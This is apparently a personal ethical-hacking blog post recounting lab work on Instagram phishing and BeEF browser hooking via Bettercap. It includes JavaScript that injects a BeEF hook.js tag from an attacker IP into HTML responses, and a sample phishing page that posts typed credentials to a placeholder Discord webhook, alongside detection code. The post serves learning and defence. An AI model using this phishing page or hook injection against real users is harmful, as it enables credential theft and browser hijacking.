Week 4 – Phishing, BeEF and a Side Of Vacation

Aditya Soni
5 min read

What was this week about?

As I mentioned before, this week was slow — I’m still on vacation. But I want to reassure you that I haven’t lost sight of my end goal. Once my vacation wraps up on August 14, I’ll hopefully have no other family commitments, and my full focus will be on driving this project forward.

This week’s goals:

  • Show at least some progress in the course (~100 minutes of course content).

  • Learn the basics of social media security and website hacking.

  • Learn how one can protect oneself from falling victim to these attacks.

What I learned this week

How Instagram Phishing Works

Instagram phishing is an increasingly popular form of cyberattack as more people join social media platforms. With over a billion active users, Instagram provides a massive target base for malicious actors. A phishing attack on Instagram can compromise a victim’s privacy and personal data.

Here’s a step-by-step look at how it typically works:

  1. Bait Email or Message – The attacker sends a realistic-looking email or direct message that pushes the victim to click a link. The message usually promises a benefit, such as getting the account verified for free, which supposedly would increase post visibility.

  2. Fake Login Page – The link lands the victim on a convincing replica of Instagram’s login page, hosted on a server the attacker controls.

  3. Credential Capture – The victim enters their username and password, believing it is the real site.

  4. Redirection to the Real Site – To avoid raising suspicion, the phishing page immediately redirects the victim to Instagram’s actual website after submission.

  5. Credentials Sent to Attacker – Behind the scenes, the submitted credentials are sent to the attacker, typically through a webhook into a chat service such as Discord, so they land in a channel the attacker controls the moment the form is submitted.

How I Simulated the Attack on Myself (Educational Purposes Only)

To understand this attack better, I recreated it in a fully isolated virtual environment to ensure no real harm was caused. This was done strictly for educational purposes and should not be used for malicious activity.

Step-by-step process:

  • Download the Script – I obtained an Instagram login page replica script from the resources of my Udemy course.

  • Replace Web Server Content – I replaced the default index.html file in /var/www/html/ on my Kali Linux virtual machine with the Instawebhook phishing page script.

  • Configure Webhook – I embedded my own Discord webhook URL into the script so that any captured credentials would be sent to my private Discord server.

  • Start Web Server – I launched the Apache2 web server using the terminal.

  • Access the Fake Page – On the same Kali machine, I visited the phishing page URL in a browser (acting as the “victim”).

  • Enter Test Credentials – I entered a test username and password into the fake login form, which then redirected me to the actual Instagram website to maintain realism.

  • Receive Credentials – I checked my Discord server and confirmed that the entered credentials (my own, for testing purposes) were successfully sent via the webhook.
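The check below is an added example; it is not the course's phishing script and not code from this post. It takes the mechanism from the five steps above and the simulation just described (a replica login form that sends what the victim types to a webhook and then redirects to the real site) and looks at it from the victim's side: given a page's HTML and the origin it is actually served from, it lists every place the login form could send credentials and flags those that leave the page's own host, naming Discord webhook hosts separately. The two sample pages, the lab address 10.0.2.15 and the webhook URL are constructed for this example; the webhook path is a placeholder, not a live endpoint.

```javascript
// Added example (not from the post or the course script): a static check of
// where a login page would send the username and password typed into it.
// The phishing page in the steps above looks like instagram.com but posts
// the form to a Discord webhook, then redirects to the real site; seen from
// the victim's side, the credential sink is on a different host than the
// page itself, which is what this check surfaces.

const WEBHOOK_HOSTS = ['discord.com', 'discordapp.com'];

// Collect every URL the page could submit form data to: <form action=...>,
// fetch('...') and XMLHttpRequest open('POST', '...') in inline scripts.
function extractSinks(html) {
  const patterns = [
    /<form\b[^>]*\baction\s*=\s*["']([^"']+)["']/gi,
    /\bfetch\(\s*["']([^"']+)["']/g,
    /\.open\(\s*["'](?:POST|GET)["']\s*,\s*["']([^"']+)["']/gi,
  ];
  const sinks = [];
  for (const re of patterns) {
    let m;
    while ((m = re.exec(html)) !== null) sinks.push(m[1]);
  }
  return sinks;
}

// Resolve a possibly relative URL against the origin the page was actually
// served from and return its hostname, or null if it does not parse.
function hostOf(url, pageOrigin) {
  try {
    return new URL(url, pageOrigin).hostname;
  } catch (e) {
    return null;
  }
}

// Classify each sink relative to the serving origin. Same-host sinks are the
// normal case; anything else is reported, with known webhook hosts named.
function auditLoginPage(html, pageOrigin) {
  const pageHost = new URL(pageOrigin).hostname;
  const findings = [];
  for (const sink of extractSinks(html)) {
    const host = hostOf(sink, pageOrigin);
    if (host === null || host === pageHost) continue;
    findings.push({
      sink,
      host,
      kind: WEBHOOK_HOSTS.includes(host) ? 'webhook' : 'cross-origin',
    });
  }
  // A post-submit redirect to another site is the "send them on to the real
  // login page" step; report where it goes.
  const redirect = /location(?:\.href)?\s*=\s*["']([^"']+)["']/.exec(html);
  return {
    suspicious: findings.length > 0,
    findings,
    redirectsTo: redirect ? hostOf(redirect[1], pageOrigin) : null,
  };
}

// Constructed sample: a replica login page served from a lab VM. The webhook
// URL is a placeholder, not a live endpoint.
const PHISHING_HTML = `
<html><head><title>Instagram</title></head><body>
<form id="login" action="#">
  <input name="username"><input name="password" type="password">
</form>
<script>
document.getElementById('login').onsubmit = function (e) {
  e.preventDefault();
  fetch('https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ content: this.username.value + ':' + this.password.value })
  }).then(function () { window.location.href = 'https://www.instagram.com/'; });
};
</script></body></html>`;

// Constructed sample: a page whose form posts back to its own host.
const BENIGN_HTML = `
<html><head></head><body>
<form action="/accounts/login/ajax/" method="post">
  <input name="username"><input name="password" type="password">
</form></body></html>`;

console.log(JSON.stringify(auditLoginPage(PHISHING_HTML, 'http://10.0.2.15/'), null, 2));
console.log(JSON.stringify(auditLoginPage(BENIGN_HTML, 'https://www.instagram.com/'), null, 2));
```

Run it with node. The same check is what to do by hand before typing a password into a page reached from a message: open the developer tools, find the form's action or the fetch() call in the page's script, and confirm that host matches the one in the address bar. A page that posts to discord.com and then sends you to instagram.com is exactly the pattern in the steps above.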

How I Hooked My Target Using BeEF and Bettercap

I hooked my target virtual machine by following these steps:

  1. Start BeEF – I launched BeEF, which began running and listening for any webpages that could be hooked.

  2. Configure the JavaScript Code – I inserted my Kali virtual machine’s IP address (the attacker’s IP) into the JavaScript snippet. This snippet calls the BeEF hook (hook.js) from my Kali VM whenever a </head> tag is detected in a webpage’s HTML.

  3. Start Bettercap – I ran the custom BeEF caplet provided in my course resources. This caplet also contained the JavaScript hook code configured in the previous step.

  4. Access an HTTP Webpage – I visited an HTTP webpage on my target virtual machine to simulate normal browsing. (Note: I could also have targeted an HTTPS page by running an additional caplet—hstshijack—which downgrades HTTPS to HTTP using HSTS bypass techniques.)

  5. View Results – Upon opening BeEF’s control panel, I confirmed that my target virtual machine was successfully hooked.
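As an added example (not the caplet from the course, and not a file from Bettercap or BeEF), the code below reproduces steps 2 and 3 in stand-alone JavaScript. Bettercap's http.proxy scripts are JavaScript with an onResponse(req, res) callback, and the BeEF caplet's script rewrites each plaintext HTML response so that a script tag pointing at hook.js on the attacker's host sits just before the closing head tag. Here that rewrite is a pure function over the content type and body so it runs in Node without Bettercap, alongside a defender-side function that lists script sources loaded from hosts other than the page's own. The address 10.0.2.15 is an assumed lab IP, 3000 is BeEF's default hook port, and the sample response is constructed.

```javascript
// Added example (not the course caplet and not a file from Bettercap or
// BeEF): the rewrite a Bettercap http.proxy script performs on each
// plaintext HTML response to plant the BeEF hook, as a pure function that
// runs in Node, plus the defender-side check that exposes it.

const BEEF_HOST = '10.0.2.15'; // assumed attacker VM address (lab only)
const BEEF_PORT = 3000;        // BeEF's default hook port

function hookTag(host, port) {
  return `<script type="text/javascript" src="http://${host}:${port}/hook.js"></script>`;
}

// Rewrite one response body. Returns the hooked body, or null when the
// response is left untouched: not HTML, no </head> to key on, or already
// carrying the tag (a second pass through the proxy must not inject twice).
function injectHook(contentType, body, host = BEEF_HOST, port = BEEF_PORT) {
  if (typeof contentType !== 'string' || !contentType.toLowerCase().startsWith('text/html')) {
    return null;
  }
  const tag = hookTag(host, port);
  if (body.includes(tag)) return null;
  const idx = body.search(/<\/head\s*>/i);
  if (idx === -1) return null;
  return body.slice(0, idx) + tag + body.slice(idx);
}

// Defender's view of the same page: every <script src> that resolves to a
// host other than the one the page was loaded from.
function foreignScriptSources(body, pageHost) {
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  const out = [];
  let m;
  while ((m = re.exec(body)) !== null) {
    try {
      const u = new URL(m[1], `http://${pageHost}/`);
      if (u.hostname !== pageHost) out.push(u.href);
    } catch (e) {
      // unparsable src attribute; nothing to resolve
    }
  }
  return out;
}

// Constructed sample: an HTML response as it would arrive over plain HTTP.
const SAMPLE_HTML = '<html><head><title>lab</title></head><body><p>hi</p></body></html>';

function demo() {
  const hookedBody = injectHook('text/html; charset=utf-8', SAMPLE_HTML);
  console.log(hookedBody);
  console.log(foreignScriptSources(hookedBody, 'lab.local'));
}

demo();
```

The proxy can only do this because the response is plaintext HTTP, readable and writable in transit; with HTTPS the body is encrypted between browser and server, which is why a downgrade step has to come first before the same injection works. On the hooked side nothing is hidden: the injected tag is in the page source, and a script fetched over plain HTTP from an IP address that is not the site's own is exactly what foreignScriptSources surfaces.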

Challenges I Faced

BeEF was able to hook my target, but whenever I attempted to run attacks against the victim virtual machine, they all failed.

How I (Tried to) Solve the Problems:

I created a basic HTML page containing only a simple JavaScript snippet to hook my target — in this case, my Windows virtual machine. Using the browser’s Inspect tool, I opened the console on the hooked page and ran:

typeof beef !== 'undefined'   // typeof always yields a string, so the comparison must be against the string 'undefined'

The result was true, confirming that the BeEF object existed in the context of the page.
Despite this, none of BeEF’s attack modules worked against the victim machine.

I even tried switching the browser used to open the hooked page, but the issue persisted.

(If anyone experienced with BeEF knows why this might happen or how to fix it, please share your insights in the comments!)

Next Week’s Goals:

  • Show more progress in the course than in the last two weeks combined.

  • Learn about external network attacks, fake game website attacks, post hacking sessions and more.

Finishing Up:

It’s been a month, and I’m still not at the point of actually building Project BlackBox. But that’s okay — projects like this aren’t sprints, they’re marathons. Every obstacle I hit is another skill I gain, another lesson I learn. My goal isn’t just to finish; it’s to grow into the kind of person who can finish something like this. The grind isn’t optional — it’s the whole point.

Disclaimer:

This blog documents my personal journey in learning ethical hacking and cybersecurity with the intent to build responsible AI tools for penetration testing and system defense.

All experiments are conducted in isolated lab environments on virtual machines I own or control. This project is strictly for educational and ethical purposes.

I do not condone or promote any form of unauthorized or illegal access to systems.
